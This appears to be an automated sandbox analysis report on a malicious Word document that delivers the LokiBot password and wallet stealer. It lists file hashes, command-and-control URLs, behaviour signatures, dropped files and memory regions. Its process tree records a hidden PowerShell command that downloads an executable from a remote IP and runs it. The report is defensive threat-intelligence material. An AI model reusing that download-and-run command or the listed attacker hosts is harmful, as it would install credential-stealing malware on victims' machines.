Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    11-05-2021 05:18

General

  • Target

    PL_017542000.doc

  • Size

    467KB

  • MD5

    f4e2b625051dd9283bbec085e56d0ab1

  • SHA1

    118cae287ef1505bf04f75d5811c340ea01fa949

  • SHA256

    f6e0f11f26c59925ad1bd23c4dc586de71af0863d7273ad41a17efd92384167c

  • SHA512

    05b3d3e1181265359cd1264f3d9b07f5d04da696791877c98f5a9a437aba4e00b35e231c76b3f7a948fd5bf1794ca1d807a04b44a523ca378971986056b98c2b

Malware Config

Extracted

Family

lokibot

C2

http://209.141.50.70/D3/13/pin.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 5 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PL_017542000.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1396
    • C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
      1⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:856
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w Hidden Invoke-WebRequest -Uri "http://31.210.20.6/w2/PLP_017542000.exe" -OutFile "C:\Users\Public\Documents\singview.exe";C:\Users\Public\Documents\singview.exe
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1732
        • C:\Users\Public\Documents\singview.exe
          "C:\Users\Public\Documents\singview.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:968
          • C:\Users\Admin\AppData\Local\Temp\singview.exe
            C:\Users\Admin\AppData\Local\Temp\singview.exe
            4⤵
            • Executes dropped EXE
            PID:1556
          • C:\Users\Admin\AppData\Local\Temp\singview.exe
            C:\Users\Admin\AppData\Local\Temp\singview.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:1264

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\singview.exe
      MD5

      217779bed934af71afc6c861f99ff065

      SHA1

      afba3658e7d5685c1e61428ada937c7b570639f7

      SHA256

      6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

      SHA512

      c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

    • C:\Users\Admin\AppData\Local\Temp\singview.exe
      MD5

      217779bed934af71afc6c861f99ff065

      SHA1

      afba3658e7d5685c1e61428ada937c7b570639f7

      SHA256

      6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

      SHA512

      c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

    • C:\Users\Public\Documents\singview.exe
      MD5

      217779bed934af71afc6c861f99ff065

      SHA1

      afba3658e7d5685c1e61428ada937c7b570639f7

      SHA256

      6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

      SHA512

      c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

    • C:\Users\Public\Documents\singview.exe
      MD5

      217779bed934af71afc6c861f99ff065

      SHA1

      afba3658e7d5685c1e61428ada937c7b570639f7

      SHA256

      6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

      SHA512

      c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

    • \Users\Admin\AppData\Local\Temp\singview.exe
      MD5

      217779bed934af71afc6c861f99ff065

      SHA1

      afba3658e7d5685c1e61428ada937c7b570639f7

      SHA256

      6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

      SHA512

      c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

    • \Users\Admin\AppData\Local\Temp\singview.exe
      MD5

      217779bed934af71afc6c861f99ff065

      SHA1

      afba3658e7d5685c1e61428ada937c7b570639f7

      SHA256

      6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

      SHA512

      c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

    • \Users\Public\Documents\singview.exe
      MD5

      217779bed934af71afc6c861f99ff065

      SHA1

      afba3658e7d5685c1e61428ada937c7b570639f7

      SHA256

      6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

      SHA512

      c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

    • \Users\Public\Documents\singview.exe
      MD5

      217779bed934af71afc6c861f99ff065

      SHA1

      afba3658e7d5685c1e61428ada937c7b570639f7

      SHA256

      6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

      SHA512

      c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

    • \Users\Public\Documents\singview.exe
      MD5

      217779bed934af71afc6c861f99ff065

      SHA1

      afba3658e7d5685c1e61428ada937c7b570639f7

      SHA256

      6e169a50fc817fbf2e60e10f1e6816aaef5567dccbd36aab28badb1114909925

      SHA512

      c8bc104bd06a887fbdac8ad14c997268394063f5d451a1bc539012e350f3c4ac2557825eefde0d16d11217aa12825a2f4f5cfd15fe6ff492ff8d83d08c11bc01

    • memory/968-102-0x0000000000CC0000-0x0000000000D4A000-memory.dmp
      Filesize

      552KB

    • memory/968-97-0x0000000001210000-0x0000000001211000-memory.dmp
      Filesize

      4KB

    • memory/968-103-0x0000000001160000-0x00000000011AE000-memory.dmp
      Filesize

      312KB

    • memory/968-99-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
      Filesize

      4KB

    • memory/968-93-0x0000000000000000-mapping.dmp
    • memory/1264-113-0x0000000000400000-0x00000000004A2000-memory.dmp
      Filesize

      648KB

    • memory/1264-110-0x00000000004139DE-mapping.dmp
    • memory/1264-109-0x0000000000400000-0x00000000004A2000-memory.dmp
      Filesize

      648KB

    • memory/1396-101-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp
      Filesize

      8KB

    • memory/1396-100-0x0000000000000000-mapping.dmp
    • memory/1732-90-0x000000007EF20000-0x000000007EF21000-memory.dmp
      Filesize

      4KB

    • memory/1732-88-0x0000000006410000-0x0000000006411000-memory.dmp
      Filesize

      4KB

    • memory/1732-68-0x0000000004850000-0x0000000004851000-memory.dmp
      Filesize

      4KB

    • memory/1732-67-0x0000000000A60000-0x0000000000A61000-memory.dmp
      Filesize

      4KB

    • memory/1732-70-0x0000000000982000-0x0000000000983000-memory.dmp
      Filesize

      4KB

    • memory/1732-71-0x0000000001100000-0x0000000001101000-memory.dmp
      Filesize

      4KB

    • memory/1732-72-0x0000000005240000-0x0000000005241000-memory.dmp
      Filesize

      4KB

    • memory/1732-89-0x0000000006560000-0x0000000006561000-memory.dmp
      Filesize

      4KB

    • memory/1732-75-0x0000000005730000-0x0000000005731000-memory.dmp
      Filesize

      4KB

    • memory/1732-69-0x0000000000980000-0x0000000000981000-memory.dmp
      Filesize

      4KB

    • memory/1732-66-0x0000000075511000-0x0000000075513000-memory.dmp
      Filesize

      8KB

    • memory/1732-65-0x0000000000000000-mapping.dmp
    • memory/1732-80-0x0000000006300000-0x0000000006301000-memory.dmp
      Filesize

      4KB

    • memory/1732-81-0x00000000064D0000-0x00000000064D1000-memory.dmp
      Filesize

      4KB

    • memory/1948-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1948-61-0x000000006FD31000-0x000000006FD33000-memory.dmp
      Filesize

      8KB

    • memory/1948-60-0x00000000722B1000-0x00000000722B4000-memory.dmp
      Filesize

      12KB

    • memory/1948-114-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB